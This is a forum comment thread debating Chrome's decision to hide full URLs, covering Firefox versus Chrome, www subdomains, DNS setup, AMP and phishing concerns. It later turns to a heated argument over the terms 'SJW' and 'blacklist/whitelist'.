You do realise that you don't get to choose between getting tracked by Google or "supporting" the goals of Mozilla Foundation (such as freedom of speech for all including your political enemies)? That is, by choosing Chrome you also "support" any and all political goals of Google (such as replacing the open web with AMP).


Sadly, yes I realize that.


Could you please clarify what are you talking about ?


Mozilla donated to riseup.net some years ago, after they shunned Brendan Eich from his own creation. Riseup.net is a encrypted mail service for OSF agitprop groups.


The question is, why haven't you quit already? The only things it offers others don't, are anti consumer vendor lock in nonsense like hangouts and google earth. (Not sure about hangouts and meet these days, mozilla likely made it work, but not for lack of scumbag google trying otherwise).


Because it has bugs that make it unusable for some people (e.g developers) - https://bugzilla.mozilla.org/show_bug.cgi?id=1628162


The difference being that when Chrome is unusable for developers (such as hiding the URL!), it's always a feature not a bug?


If I need the whole URL visible at all times as a developer, that's an hour of chrome extension writing to make it always viewable.

Can I pull that off in FF?


I'm not sure I understand. Are you asking whether Firefox supports browser extensions? If so, the answer is yes. Firefox has always had extensions including epic breakthroughs such as Adblock (Plus) from 2002 and Firebug from 2006. (Google Chrome has had extensions since 2010.)


> If I need the whole URL visible at all times as a developer, that's an hour of chrome extension writing to make it always viewable.

Interesting. Other comments in this thread indicate that the only extension that can do this has its ID hard-coded in the url parsing code to be whitelisted.


An extension can get window.location and can then paint it anywhere on the page the developer chooses, or put it in a drop down, or send it to an external service via an HTTP request and beam it to the moon, if the developer wishes.


I would also add that, to personal use, Firefox has some features that seem half-baked. Like:

1 - Selecting multiple tabs and saving to bookmarks: you can't add to an existing folder without creating a subfolder.

2 - Add keywords to bookmarks: no way to filter bookmarks that have keywords. Also, when typing on the address bar, the keyword doesn't get highlighted or anything

3 - can't add a custom search engine. You have to add its extension, if available. Or add as a bookmark with a keyword, but then you won't be able to see a list of all search engines...


> 3 - can't add a custom search engine. You have to add its extension, if available. Or add as a bookmark with a keyword, but then you won't be able to see a list of all search engines...

As a full time, happy Firefox user, this annoys me to no end, increasingly so as there are more and more competing search engines that I want to try.

I’m pretty sure that you used to be able to add arbitrary search engines too (by specifying the search URL with %q for the search query). It’s amazing to me that they would remove this.


> more and more competing search engines that I want to try

Not only that, but on Chrome I have Amazon, Youtube, Reddit, all setup as search engines. For reddit, besides 'rdt' for general search, I also added keywords for searching inside /r/anime, /books, /ps4, and a few other subs I occasionally search.

I also think they used to have this, as Chrome still has. But no idea why they changed it.


Also any of the many sites where content for different people is hosted under example.com/~username/content


Next step: an "education campaign" to tell people that that part of the web is "insecure". In fact you should only get any content from a handful of domains. And in non-net-neutrality jurisdictions, the ISPs will start offering packages that work with pre-approved domains only. And since it'll be enough for 90% people, it'll work.

I hope I'm just being alarmist.


This already kind of happens in Firefox. If you have a non public certificate authority, when you visit a site signed by that CA it says that it's not verified by an authority known to Firefox.

I don't know if there is a way to "bless" such an authority once it's added to the trust store.


? If it’s added to the trust store, it should be blessed. Note that this is the FF store, not the Windows one.


What browser doesn’t warn you about sites signed by a CA not in their list of CAs?


I specifically said "once it's added to the trust store". It is known to the browser.

When I wrote the message I wasn't in front of Firefox, now I am. So to summarize:

* The CA's certificate is added to the Firefox store and trusted.

* Visiting a site gets the lock in the address bar.

* Clicking on the lock in bar shows "Connection secure. Connection is verified by a certificate issuer that is not recognized by Mozilla"

Screenshot: https://imgur.com/a/T4rznXK


So what’s the problem? Mozilla didn’t add the CA to the trust store, you did, that’s why Mozilla doesn’t recognize it. It doesn’t sound like it interferes with normal operation and differentiating bundled and added CAs on inspection sounds like a good idea.


This is a completely different matter.


That's technically correct, but as far as the security of the website is concerned example.com, example.com/~eviluser/uh-oh, and example.com/nefarious/sub/directory/pretending/to/be/google.com/ are all exactly the same. The issue Google are trying to "fix" is making it more clear that the domain the user sees is what they're really looking for. If a user on a website is being evil it's up to the website owner to stop that, not Google. Google are trying to protect people against evil website owners (or so they say...).


I switched to Firefox the moment they hid the `www` prefix.


It's not actually a prefix. It's a subdomain, and there is no requirement for actually having it. It's just a convention that a lot of sites follow.


I switched (back) the moment they hid "http/https".


What’s so bad about hiding www? I kind of prefer it hidden


Real example of why this is a bad idea: www.cs.usfca.edu is not cs.usfca.edu. The latter doesn't even have a DNS entry set up..

A screenshot of the browser will not show the www, making it more difficult to find the website.


How, in the 21st century, has USFCA not gotten the memo to redirect HTTP requests to a root domain to a default subdomain instead of black-holing them?

At this point, That's just sloppiness on USFCA's part.


www.example.com and example.com don't necessarily resolve to the same place.


A common convention with system administrators is to have the canonical name at www.* and redirect www-less requests to the former. If you argue that a browser implementation should fix uncommon configurations, I would argue that administrators should fix their configurations in the first place.

You don’t have this issue at all for domains that don’t have a www subdomain.

Furthermore it would be extremely confusing to have different content for www.example.com & example.com.


Yeah, I don't like the current trend to redirect www to root. You can easily doing simple dns-based load balancing by having multiple ip addresses on the www subdomain. You can't do that on root domain, you'll have to use a dedicated load balancer even if all you want is just simple load balancing among a small set of servers. It only benefit cloud vendors and hurt hobbyist/small website operators if this trend continues to the point that visitors expect all websites to be served from root insetad of www.


If we could ever be bothered to implement SRV records for http then load balancing and failover could be significantly more straightforward and robust, without worrying about root vs. www at all.


I also dislike the trend to redirect the 'www' prefix to root.

My company uses DNS load balancing for a root domain, though, so either I'm misunderstanding you or you're mistaken about what's possible here.

We use Constellix's DNS management to have round-robin DNS via multiple A records for 'nxtbook.com'.

If you're thinking of some other form of DNS load balancing, would you please clarify?


Multiple A records is fine on root domain, but root can't use CNAME, which is used by some people to implement their dns load balancing (I use cname so I forgot that you can still do it using A records). By using root domain instead of www, your options for load balancing is diminished.

Edit: another common use case is hosting your static website on S3 or github pages. Typically it's done by adding a cname entry to s3 or github.io (been a while so hopefully I remember it right). You can't do this on root, unless you're using another server as reverse proxy (e.g. cloudflare's cname flattening service). Again, it's benefits cloud vendors (cloudflare got more potential customers by offering this service for free) but ultimately hurt people that want to host their small websites.


Ah, gotcha. We CNAME a lot of things precisely so we don't have to mess with multiple A records.

Definitely simpler, and a good argument against using the root domain.

Thanks for clarifying!


Redirecting a subdomain to root should be a choice not forced.


> I kind of prefer it hidden

But why?


because it's never significant or useful


The company I worked for had www.* as a web presentation for the SaaS app and SaaS app running on *.

So yeah, hiding www is annoying and confusing in this situation, because Google just assumed something about the web/domains and forced their assumptions on everyone.


> because it's never significant or useful

But www.example.com isn't necessarily the same website as example.com.


What's the practical implication of this fact?


The fact that www.example.com and example.com resolves to the same place is a happy accident due to someone explicitly configuring it so.

As a practical example, the website for my current employer had not configured their "bare" domain. When applying for a job I decided to check out their website, and copied only the "bare" domain and pasted it in my browser. Didn't work, just timed out.

I tried a few times and through "huh, website down for a few days, that sure doesn't look good". Then on a whim I figured I might try the "full" domain, and sure enough that loaded up straight away.

One of the first things I got done when I was hired was to ensure the "bare" domain worked.


That the difference between them should not be hidden.


Yeah but would you discover that by looking at the url? In the vast majority of cases it'll be mentally filtered out by the user anyway for the same reason why nobody cares about the http and :// part, they just want to know if it's secured or not.


> Yeah but would you discover that by looking at the url?

If I want to be on www.example.com and I'm actually on example.com, then yes I can discover that by looking at the URL.


You and maybe the 3 other people that might also notice if a site is serving different pages for http vs https. If it's accessible in the browser its already part of the world wide web so what information is it even conveying?


> so what information is it even conveying?

I feel like I'm going in circles.

They're two different web pages. Possibly with entirely different information. Possibly run by entirely different people. Possibly with entirely different trust levels and threats. It conveys which of the two web pages I'm looking at. How is that not useful information?


All WWW was supposed to mean was HTTP accessible. Now that every domain why should a user using a http* browser have to specify that they intend to access it via http* when they have no other choice? Either the server responds or it doesn't. www.foo.com and foo.com both return http traffic then they are both part of the world wide web.

The specific of how you've decided to run your site or serve your pages is irrelevant. You may serve a page depending on if the http request came over port 80 or some other port or via http or https or at this time or that time or other.


I don't think you get it.

www.example.com and example.com might be two different websites.

If you want the content at www.example.com and you go to example.com, then may not get the content that you wanted. One might be a shop selling shoes and the other might be a shop selling hats.

If you want a hat and you go to the one selling shoes then you're going to be disappointed.

'www.' doesn't 'mean was HTTP accessible'. You can make any system HTTP accessible, or not if you want to.

It doesn't matter how you or I set up our websites, or whether you or I think it's a good idea to have different websites at these addresses, it matters how other people set up their websites and if they choose to do this or not. Some do! Therefore the user needs the information.


Anything might be two different websites.

You could send different websites based on what port the request comes from. But doing so would be bad and wrong, and showing the user the outgoing port is definitely not necessary.


> You could send different websites based on what port the request comes from.

But that's you controlling that, as the person running the website.

When it's the user controlling it, by setting which domain to visit, that's in their control, so they need to see it in their UI.

If you're going to reduce to the absurdity of 'anyone could serve anything from anywhere' then why show a domain at all? ebay.com could serve me the content of google.com, so let's not bother with domain names? Is that your argument?


The person controlling the website is responsible for making www and non-www show the same thing, as well as making http and https show the same thing. (Redirects are fine.) A user's ability to affect something doesn't automatically mean it's their responsibility.

I'm not making an argument about what should be shown right now, I just think your argument, based on what "might be different", is pretty flawed.


> The person controlling the website is responsible for making www and non-www show the same thing, as well as making http and https show the same thing. (Redirects are fine.)

But there's no standard that requires this, that I'm aware of.

Chrome are acting like there is, but I believe there isn't.


There's no standard that says you have to deliver the same data to anyone as far as I'm aware. It's still an absolute abomination if http and https are different sites, for example.


... it's the most significant part of the lookup.


Couldn't this also be harmful _using_ something like github pages? Someone could create a page that would look almost right for, as an example, https://username.github.io/google/google-authenticator-andro...


.GitHub.io is considered a top level domain, so it will still show the repo name. In the same way .co.uk is a top level domain.


Which of course allows Google to arbitrarily pick websites to privilege at the level of an actual TLD.


No, it's not Google arbitrarily picking that, it's a project maintained by the Mozilla Foundation.

https://publicsuffix.org/


Subdomains are part of the URI authority component so they should be shown. It will look like `something.github.io` or whatever.


www is dropped from the url, so I don't believe that's the case


It is, there’s a long special list for domains that host arbitrary subdomains, GitHub pages is one of them. It’s explained well in https://youtu.be/0-wB1VY3Nrc


Wait, seriously? Their default behaviour is so broken that they have to whitelist a ton of sites, and screw anybody who slips through the net (or is trying to start a new service)?


Most browsers use the Mozilla public suffix list [1] that is frequently updated, and a new service can easily submit a new entry. This list is used for many different features.

This list is necessary anyway, because you have top level domains that look like .co.uk, so you can't just split the domain name by dots and take the last component to determine the top level domain.

So, not saying I unconditionally like the fact they are hiding important information in the URL bar, but I would not say their default behavior is that broken.

[1] https://publicsuffix.org - probably the list being mentioned in the video linked by the parent commenter, I guess


This list seems to be actually used to determine how cookies can be shared across domains, but not by Safari? Does this mean that Safari might have different behaviour as to when cookies can be shared across domains?


Chrome is/has/was special-cased dropping the display of the "www." prefix, and that one only, for a while now.


Yeah, I think having it intelligently bold/highlight or perhaps reduce significant parts of the URL would go a long way and likely makes more sense as a next step.


That's exactly what Firefox does. I am typing this on Firefox and in the address bar "ycombinator.com" is in black and the rest of the address is in grey.


Well chrome has been doing that for a while too but what I mean is more like significant parts of the url for trust like say the user in github.com/<user>/<project>, because the user represents a significant silo similar to if it were instead organized like <user>.github.com/<project>

For example if I were to go to something like https://raw.githubusercontent.com/<user>/<proj>/<path> or

the most relevant parts of the url as far as security/trust is concerned is the domain githubusercontent and <user> not the raw subdomain


Well, whilst that is a nice idea I can't see it happening anytime soon. Attempting to work out if a part of a URL represents a user name seems like a bit if an impossible task to me. I guess you could encode rules for specific well known sites but I doubt you could ever create a general solution, and if a site changed its URL you would become unstuck until you rolled out a fix.


It would be harmful for any site, whose content 'root' is not (sub)domain. Thus most user-submitted content - projects on github, youtube channels, ...


"URLs as breadcrumbs" solve this cleanly. They've already been visible for years in web search results.

Here the address bar would show "(padlock) [Github Inc] Github.com > Name Of Account > Name Of Project" for example. This is much clearer for end users.

Developers can always toggle an option to always show the URL or something.


> I will quit using Chrome.

What's taken you so long ?


Honestly at this point I honestly have no idea why a wast majority of people are still choosing to support google's browser.

Google is an ad-company and will do everything in its power to change the web to fit their business. You the user don't matter anymore.


Google munging the URL on it's own search results to look like a breadcrumb bar is among the primary reasons I do not use google.com as my default search engine anymore. I'm surprised they didn't do the same on the URL bar instead of hiding the full URL.

That being said, if you look at most non-IT persons using a browser, the URL is just visual noise for them: showing the domain prominently is perhaps (and _just_ perhaps) a better way to make them take notice.

Not that I would ever use this for myself though. I already disable FF URL formatting and "trimming".


I just hope firefox doesn't follow this trend. It was too difficult for me to adjust to their "one click select all" address bar that I now use ctrl + L for address bar interactions.


The final goal is to make amp urls look like regular ones


Google wants to be the new AOL.


I moved back to Firefox last year and haven't had any reason to switch back to Chrome. FF has been plenty performant and even if was few microseconds slower than Chrome, I will still stick with it because it's in our collective interest to keep the competition alive. This ridiculous decision by Google just made my resolve stronger.


Ditto. At first the biggest thing I struggled with was less-obvious profile support in FF, but container tabs and a bookmark on the toolbar to “about:profiles” nearly completely solved that. Now I greatly prefer my FF config and am glad to be free of Chrome decisions like this.


Hopefully they are sued for IP violations again in Europe.

This is extremely sketchy, just stealing other people's content (as they also did on YouTube for years):

https://www.androidpolice.com/2018/09/21/chrome-tests-hiding...


Well you have to do something when search and ad revenue is slowly creeping away.

These are dark patterns, making way for other browsers, such as Firefox.


Omnibox concept could help mobile browsers - not that Google would give this screen real estate easily away - but what if the address bar could serve as site wide search of the current site at all times with no more interactions. Absolving website sticky headers, sandwich menus. This could empower the "native web" against apps on small-screen devices.


It's already pretty difficult to get a full URL on a random bug report/screenshot.

This sadly will ensure this keeps being the case...


This "URL eliding" makes parameters impossible to click and select. So annoying. I filed a bug for desktop Chrome:

https://bugs.chromium.org/p/chromium/issues/detail?id=108440...


If at this point you still use Google products, while equal or better alternatives exist, you get what you deserve.


Showing the full URL may detract from the parts of the URL that are more important to making a security decision on a webpage

I would like to see some examples of this because that makes zero sense. The only reason I can see is to “dumb down” the browsing experience to reinforce Google’s position as gatekeeper.


Why can't we just have two address bars? One for general "end" user that's optimized to help them against phishing and all, another one that's just the bare plain old URL? The toolbars are customizable, why not just add this option?


This is wrong on SO MANY levels.

I'm glad I've switched back to Firefox when they launched Quantum.


Most sites use dynamically generated content with URLs that are essentially meaningless. The path for this comment thread in HN is "/item?id=23516088". A lot of websites append literally kilobytes of values to the querystring.


Nowadays when I connect to Google using the Googlebrowser powered by the Googleprotocols to access the Googlecontent I don't care about weird symbols like 'https', arcane concepts like URLs, etc.


Couldn't they just show the domain name in bold? It's that simple.


Must have hired too much Gnome designers :). /s

(I actually like Gnome's statement)


My concern is that Google will eventually remove this flag and make this the default behaviour without any way to disable it. Safari, on the other hand, has an option to turn the feature off.


This is a bad idea for domains that have usernames included in the url.


I believe this is already the default behavior in Safari. On iOS this is the only option.

Personally, I don’t mind this being the default so long as there is an easy way to change it to see the full URL.


This and AMP, I mean, it's clear what Google is up to.


Bring it on. Users not knowing the path means search engines not using the path for ranking means a whole class of boring human readable SEO work goes away.


Presumably, this is going to mean developers, QA and security testers move away from Chrome as the URL bar is pretty key in many aspects of their job?


On many corporate networks I've used, its often far easier to directly change the URL to navigate than to use any other means.


So Chrome is only showing the domain part now? Just like Safari has been for a long time?

Personally I quite like it. From what I understand the main goal is to make phishing attacks more clear to the user, since this is ultimately only a thing the end-user can protect against. Removing the noise definitely helps for that.

Having had it like this in Safari for a long time, I must say I greatly prefer this over the older behavior---the only time I care about a full URL is when I select it to copy it.


It's awful for navigation context. They could easily solve for the phishing problem by highlighting or underlining the domain name.


Safari has an option to include the full URL. As a developer, I need the full URL so I turn on the option. If Chrome by some miracle actually goes through with this, I'll try to see if I can get around it (because at the end of the day, everyone uses chrome and chrome dev tools are by far the best).


Other comments are saying there's a flag (chrome://flags) to show the full URL, at least for now.


> chrome dev tools are by far the best

How are they better than those in Firefox? It looks like you did a thorough analysis.


Chrome dev tool used to be far better than any native alternative. Including Firefox, but Firefox has caught up. A tad too late as Firefox had, prior to chrome, the best native dev tool.


You must be a non-web developer, otherwise you would not have this question.


Just use Brave. You can install Chrome dev tools on it.


I agree. I spent a few minutes confused as to what everyone was so mad about. Surprised this is an issue for anyone.

Unless you need to modify the URL often, but it has the hover behavior and if even safari has an option for it, I can't see google removing that option.


This has been like this forever in Safari if "Show full website address" is disabled (which is the default I think).


Is it possible to build a proxy that translates AMP pages to real URLs? Maybe I could make my PiHole do double duty.


The reason for this is that Google wants to bully the world into AMP


Maybe so, but please don't post unsubstantive comments to HN.


Non sequitur


I can not believe now that GUI design at Google is not staffed with passing amateurs, and low end cadres


Bold typesetting of the domain, the rest in regular font and silver gray would provide a middle ground.


Too far ! Address bar is part of "validation" for am I on the right site.


For what it's worth, this is already the default behavior in desktop Safari.


I think I'll double my annual donations to Mozilla starting this year.


It looks better than their previous attempts to obfuscate the URL bar.


This feels like a good time to celebrate how I uninstalled Chromium from the last device I was using it on last week. 100% Firefox now!

DuckDuckGo gets about 75% of my searches nowadays with the rest going to Google. Still using Maps, GSuite and Android... Baby steps!


I know the average user probably doesn’t care much for URLs but I definitely do and it seems a chunk of HN crowd are with me. Would it be THAT hard to have a toggle option in the Settings so those who want to could preserve the URL?


If I were Facebook, I’d start building a browser yesterday.


Maybe, AndroidPolice should change its name. Just saying...


Use Firefox and DuckDuckGo instead of Chrome and Google.


when you change route on angular/react and wondering why it's not reflecting .... and suddenly remembers it's chrome 85, facepalm moment


My next Web application will not work in Chrome. Easy.


Why would you want to block 70-75% of Web users from your web application?


I am switching browser to Firefox because its nicer.


We need competition among browser vendors to prevent/discourage these abuses. Chrome is becoming IE of the early 2000s. I switched to FireFox ~2 years ago and couldn’t be happier.


Opera already does this and I hate it for that.


Google is dumbing down tech so new users don't understand the basics of the internet. Seems like a winning strategy and the culture they have built their company on.


Nope, I want the full URL, including protocol, or at least the option to show it. Otherwise it creates ambiguity, confusion, and a security hole.


Hopefully Firefox doesn’t follow suit.


Phishers sites will love this change.


Looks good to me. Nice UX. Normal users don't care about the URL and you can still copy the full URL if you want to share a link.


Why are y’all still using chrome?


Breaking up Google or someone actually being a competitor sounds like a really healthy thing to me more and more.


So no longer will I know if I’m inside a new type of Amp type page google is planning


Can we all please go back to Firefox?


Another phrase I live by: "the road to Hell is paved with good intentions."

There will be some VP of Product or Engineering buried deep in the bureaucracy who is pushing this, deciding with no evidence (or, worse, lots of evidence to the contrary; believe me this happens) that it is the "users who are wrong" [1].

It now takes something like 4 taps to get to the point where I can correct or otherwise edit the URL in my mobile browser (Safari) as I have to go through different layers where someone, somewhere has decided I can't possibly mean to edit the URL so I must be wanting to select the entire thing.

I'm sure this same "it's the users who are wrong" from a handful of key stakeholders that is pushing AMP. And for something that supposedly improves the mobile experience, it doesn't fit on my iPhone 11 screen and it's also disabled zoom. This is probably because I've changed the default zoom, something that gives me no end of problems but I can't control how bad my eyesight is and I don't need a company telling me I'm wrong for wanting to zoom. There is never an excuse to disable zoom on a browser and browser makers should remove the ability for sites to do this, period.

I used to love the simplicity and features of Chrome. I once relied a great deal on Chrome Sync. For years I've used a password manager so a lot of the need for that has gone away. Sometimes it's nice to be able to open a page I have open on another device but I can also live without this.

I'm tired of this anti-Web and anti-accessibility SJW nonsense to the point that yeah, I'm ready to ditch Chrome.

[1]: https://www.youtube.com/watch?v=HMqZ2PPOLik


"It now takes something like 4 taps to get to the point where I can correct or otherwise edit the URL in my mobile browser (Safari)"

Just FYI, you can touch once in the URL bar to set focus to it (the whole URL will be selected), then touch and hold down on the keyboard (which will then act like a desktop touchpad) to move the cursor around to edit the URL.

I find this handy, though it took me a while to get used to it.


> I'm tired of this anti-Web and anti-accessibility SJW nonsense to the point that yeah, I'm ready to ditch Chrome.

It's funny what the final piece of straw is that breaks peoples' metaphorical camels' backs.

Still, better it breaks and people make the move to greener pastures — hopefully Firefox rather than Chrome-with-even-more-questionable-ethics … I don't remember the name, something like Courageous or Fearless or something like that.

(Poor camels, though)


It is the little things that piss you off. Tracking and spyware is too abstract. Hiding the street and house number in the adress bar is not.


> It's funny what the final piece of straw is that breaks peoples' metaphorical camels' backs.

For me, it was their removal a few years ago of the option to use the Backspace key to go back to the previous page.


It strikes me as not fair that comments are flagged and one line remains by being quoted.

The comment was entirely reasonable apart from the (accidental?) misuse of the TLA. But it also was anti-management and anti-talker, so lots of parasites here would have downvoted it anyway.


FF + Edgium is nice combo, your choose your point of equilibrium


>SJW nonsense

Uh, what? It’s changing the UI to hide parts of the URL.

Look, I’d prefer it the other way too, but we have to choose the right words. The thought process shouldn’t be “I’m mad, what else makes me really mad like this? Oh yeah social justice workers. This UI change is therefore like social justice work.”


If anything, there's, from my experience, a good overlap between the SJW types, and the people who push for accessibility/ a11y as the cool kids call it, as it sorta falls under the inclusion initiatives.

EDIT: I was clearly disagreeing with the parent badmouthing SJWs wrt accessibility...


> there's, from my experience, a good overlap between the SJW types, and the people who push for accessibility/ a11y as the coop kids call it

"Pushing for accessibility" is a pejorative now? What in the world is going on in this thread?


No, you’re just assuming it is because it’s next to the word SWJ.

The parent's point is that someone who would self-identify or otherwise be described as SWJ would more likely push for greater accessibility to a fault rather than reduce it for aesthetic reasons. The attack on “SJWs” in the grandparent is misguided because it misunderstands their motivations so completely that it’s clear that the term is just meant as “people I vaguely don’t like and I feel have it out for me somehow.”


Thanks, at least someone got me! I was trying to call out randomly blaming people who, if anything, would be on their side, but it seems like most people misunderstood me.


I never said it was? I said if anything the SJWs they are blaming would be on their side, so it's a weird dig to make.


Sure (I'm not sure that Venn diagram is a perfect overlap, but whatever), but AMP is bad for reasons other than accessibility.


AMP is just _bad_, IMO. Content regularly is broken till you visit the actual site, sites don't follow my dark mode preferences, and interactive elements don't translate that well sometimes.

It feels like someone printed out a website to a PDF and decided that was good enough to serve!


Insightful, but I am confused by the final paragraph:

> I'm tired of this anti-Web and anti-accessibility SJW nonsense

“SJW” must have a meaning I’m not familiar with, because Social Justice Warriors would be pro-accessibility, not anti.


Perhaps they meant something like vigilantism or a crusade, and feel it's synonymous with SJW.



That’s not an example of idiocy.

Idiocy would be an anecdote my father told me in the mid-90s about his workplace trying to implement the same spirit with a naïve global search-and-replace, leading very quickly to a company-wide invitation to an “African-American tie dinner”.

But even that isn’t anti-accessibility.


I believe the preferred term these days is "tie dinner of color"


Its a decision I tend to respect (would actually never though of this myself). I don't think it patronizes the users in contrast to the decision like mentioned in the OP. Awareness of language is not all bad as it will influence us subconsciously. We seemingly did not need the term much in the 80s with the ending of the cold war, so IMHO it is not a huge loss: https://books.google.com/ngrams/graph?content=whitelist&year...

Without mentioning other connotations, IMHO the rise of computers have in places supported discriminating (ie. 0 vs 1) culture, because that is simply what computers can do best. If just renaming terms changes changes this can in fact be doubted.

I am actually not so happy about the consequences of hiding URLs to people. This will also change how we will perceive the Internet but IMHO not for the good. And here the motivations are not as clearly communicated here. It might actually hide some of the beautiful heterogenity and complexity of the Internet to the average user also with unforeseeable consequences.


I'm not against the effort just because "block-list" and "allow-list" are more speaking and self-evident in their meaning. Insinuating that "black-list" and "white-list" are somehow racially charged terms is the idiotic part.


Changing from blacklist and whitelist to blocklist and allowlist is one of the many small things we can do that makes our black colleagues feel seen, heard, and welcome in our workplaces. I support it. No one thinks changing language is enough to eliminate the systemic racism oppressing black people in the US. Eliminating that will require work and personal change. If you can't even stop using black to mean negative in the workplace and substitute it with more accurate words - the new words are clearer - then you likely are not prepared for the real work ahead. I personally refuse to work for any company that is not committing to that work.


Why would anyone be offended by blacklist? Would they be also offended by the color black? Or maybe dark mode, that is getting popular?

Or maybe offended by the fact that most pages on the web have light/white theme?

This is getting ridiculous (together with github ditching the name "master" - https://twitter.com/natfriedman/status/1271253144442253312), maybe it is the result of too much working from home recently - people create problems where there are none.

What is even more funny is the fact that those changes are proposed by white guys without any complains from the black folks.


There is a qualitative difference between your examples and “blacklist”. Dark mode is about color. The color black is a color. Light mode is a color’s brightness. A widely used white background is a color. I don’t think any reasonable person objects to using terms about color to refer to colors. Black objects are black, red objects are red, etc.

But “blacklist” is entirely different. “Blacklist” uses a color term to describe the acceptability of something. It relates a value judgment to a color. I don’t know the history of the term, but I can easily see how it could be at least somewhat offensive.

None of this is to say that the term “blacklist” is problematic or should be discouraged, but your argument about it doesn’t hold water.


But it wouldn't ever cross my mind that black list is in any way related to people with dark skin color.

I don't know how others feel about it, for me connecting blacklist to those is quite racist.

What would you say about Black Friday?

Or white Christmas?


Black is also not a color, but the light not being reflected or emitted or let through. Hence the blacklist, it doesn't need to have judgement or historically loaded meaning.


I don’t see your point. Blue is not a color. It’s just a failure of red or green light to be let through.


I think there is an insidiousness to our language that can help to stabilise social discrimination, and most of us (white/black, male/female) are unaware of it.

Dark mode doesn't have negative connotations. A 'blacklist' is negative selection, as opposed to a 'whitelist' which is positive selection. I didn't even realise this until I came across, and, on reflection, I agree that this is a simple change in the right direction.


> Why would anyone be offended by blacklist?

Because of its etymology and history [1] for starters:

    n.

    also black-list, black list, “list of persons who have incurred suspicion,” 1610s, from black (adj.), here indicative of disgrace, censure, punishment (attested from 1590s, in black book) + list (n.). Specifically of employers’ list of workers considered troublesome (usually for union activity) is from 1888. As a verb, from 1718. Related: Blacklisted; blacklisting. [32]
"It is notable that the first recorded use of the term occurs at the time of mass enslavement and forced deportation of Africans to work in European-held colonies in the Americas."

> Or maybe dark mode

Dark mode is not used in a negative way like "blacklist" or "blackballed". And it accurately describes exactly what happens. Unlike "blacklist" which is an inaccurate idiom that relies on "black" being used to mean "bad". So no, I doubt "dark mode" would offend anyone.

> Why would anyone be offended

You could start by learning about microagressions [2]. This one covers "blacklist" specifically. And was presented by a black man if that helps you with credibility.

> This is getting ridiculous

I agree that systemic racism has gone on for far too long. Even conservative four star US generals are starting to say we need big changes in society.

> What is even more funny is the fact that those changes are proposed by white guys without any complains from the black folks.

You are wrong. Just as one small counter-example the presentation I already cited that discusses "blacklist" was made by a black man. Anecdotal, but my black friends have sent me many resources recently about how to become a better anti-racist. Our diversity initiative at my current client is being lead by a black employee. This is coming from oppressed black people who have been very visibly protesting injustice for over two weeks now for the most recent injustice. And for decades actually for anyone who has been listening.

[1] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6148600/

[2] https://www.appic.org/Portals/0/2018%20Conference/APPIC%2020...


It's worth noting that "blacklist" is awful because it's origins are in British history, having to do political assassination and conspiracy. Amongst a bunch of very Caucasian parties.

The "black" is not racial but metaphorical, as in "the absence if light". The connection to dark-skinned folks is accidental through the science of optics. Light being good and darkness being bad is part of most (all?) monotheistic culture. To excise them all would include considering much art, culture, and even holy texts insensitive. It's overkill, especially when there are more pressing reforms to pursue.

There's a nice confluence where basically all parties win by eliminating "blacklist" from benign contexts, but the original violence is not racial at all. Religious and political, sure.

In case I am not clear, if we want to be on the side of education, accurate history, and truth, we should not assume racist history and intention everywhere. In this case, it's an entirely different form of tyrrany, violence, and bigotry, but we should be careful about appearing overzealous and under-informed.


> It's worth noting that "blacklist" is awful because it's origins are in British history,

> The connection to dark-skinned folks is accidental through the science of optics.

Both of these are an oversimplification that leaves out other context and other history.

The first recorded use of the term "blacklist" occurs at the time of mass enslavement and forced deportation of Africans to work in European-held colonies in the Americas.

> To excise them all would include considering much art, culture, and even holy texts insensitive.

That is a strawman. No one is suggesting to eliminate all historical uses of darkness meaning bad. What we are talking about is very specific: words that are very commonly used in a modern work setting, and that have clearer alternatives.

> The connection to dark-skinned folks is accidental.

It far too convenient that "black" continued to mean evil in the midst of widespread dehumanization and slavery for it to be purely accidental.

Consider also that the Latin word "niger" had many of the same figurative senses ("gloomy; unlucky; bad, wicked, malicious"). Another accident?

But if it were accidental - and I think that would be near impossible to prove - many microagressions are accidental.

> we should not assume racist history and intention everywhere

That's another strawman. Where was that assumption made? Besides the fact that much of modern Western history is racist.

Racism against black people in the US has survived for well over 200 years. Thanks much in part to lack of intention. Clearly, it's not enough to have absence of bad intentions. We tried that, and it is not working.


I would appreciate citations for your claims about racial origins for the term. Wikipedia does not mention any such thing in either the article for blacklisting nor in the disambiguation for the word blacklist.

There is also this quora answer from an apparent Yale linguist specifically saying blacklist does not have racial origins, mentioning other phrases like "black sheep" that are only racial in inference, not especially in implication.

https://www.quora.com/Is-the-term-blacklist-racist

I also disagree that microaggression can be accidental, though I do think reflexive actions can betray racial attitudes. But that lies typically in instinctive actions like purse-clutching, not in formation of artistic or other creative devices like Stevenson's black spot, Tolkein's Black Gate, or the various incarnations of "black swan".

To reiterate, I am actually fine getting rid of the term blacklist given it's very negative history, but it's a stretch, and counterproductive, to racialize the term. That sort of overreach plays into the hands of people like Trump, who are not afraid of portraying these movements as unhinged.


“In the black” is a positive business term signifying profitability, as opposed to “in the red.” Is this just words, or words to hurt Native Americans? Side note, if we all change from blacklist to blocklist and such, I don’t mind and it likely is a better term. I just want to point out that black != bad.


There are lots of real problems out there, but this is an imaginary one.


Already addressed in my original comment:

If you can't even stop using black to mean negative in the workplace and substitute it with more accurate words - the new words are clearer - then you likely are not prepared for the real work ahead.

I'll also add the problem is not imaginary. Microagressions are a well documented and well studied category of racism. You can find many studies with supporting evidence. While you might choose to critique the scientific rigour of existing studies, you would have to do that with your own counter evidence, and not with a dismissive "it's imaginary". You could start here: https://journals.sagepub.com/doi/abs/10.1177/174569161982749...


The white:black :: good:evil dichotomy has been open to criticism since one group of people labeled themselves white and another group of people black. That was when the colors became politicized.


That dichotomy is older than politics, and has more to do with day being safer than night for diurnal animals like humans.


You’ll have to think and decide for yourself whether this is idiocy. I, for one, do not. The master/slave thing is stupid. The master branch in git is idiotic. Whitelist and blacklist, I can do without.